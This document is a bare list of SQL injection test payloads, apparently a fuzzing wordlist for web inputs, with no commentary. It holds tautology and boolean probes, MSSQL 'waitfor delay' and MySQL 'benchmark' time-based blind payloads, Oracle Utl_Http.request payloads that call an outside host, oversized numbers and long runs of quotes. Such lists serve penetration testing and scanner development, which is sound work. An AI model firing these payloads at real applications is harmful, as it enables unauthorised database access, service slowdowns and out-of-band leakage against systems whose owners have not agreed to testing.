'
-- 
%
"
`
)
' or '1'='1
1 or 1=1
+1-1
' and '1'='2
1 and 1=2
'+'
"+"
999999999999999999999999999999999999
-999999999999999999999999999999999999
';waitfor delay '0:0:30'--
1;waitfor delay '0:0:30'--
1);waitfor delay '0:0:30'--
1));waitfor delay '0:0:30'--
a');waitfor delay '0:0:30'--
a'));waitfor delay '0:0:30'--
1 or 1= benchmark(5000000,sha1(9999))
a' or 1= benchmark(5000000,sha1(9999)) or 'a'='a
'||Utl_Http.request('http://zxcvbn.co.uk')||'a
1 or Utl_Http.request('http://zxcvbn.co.uk')=1
x''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
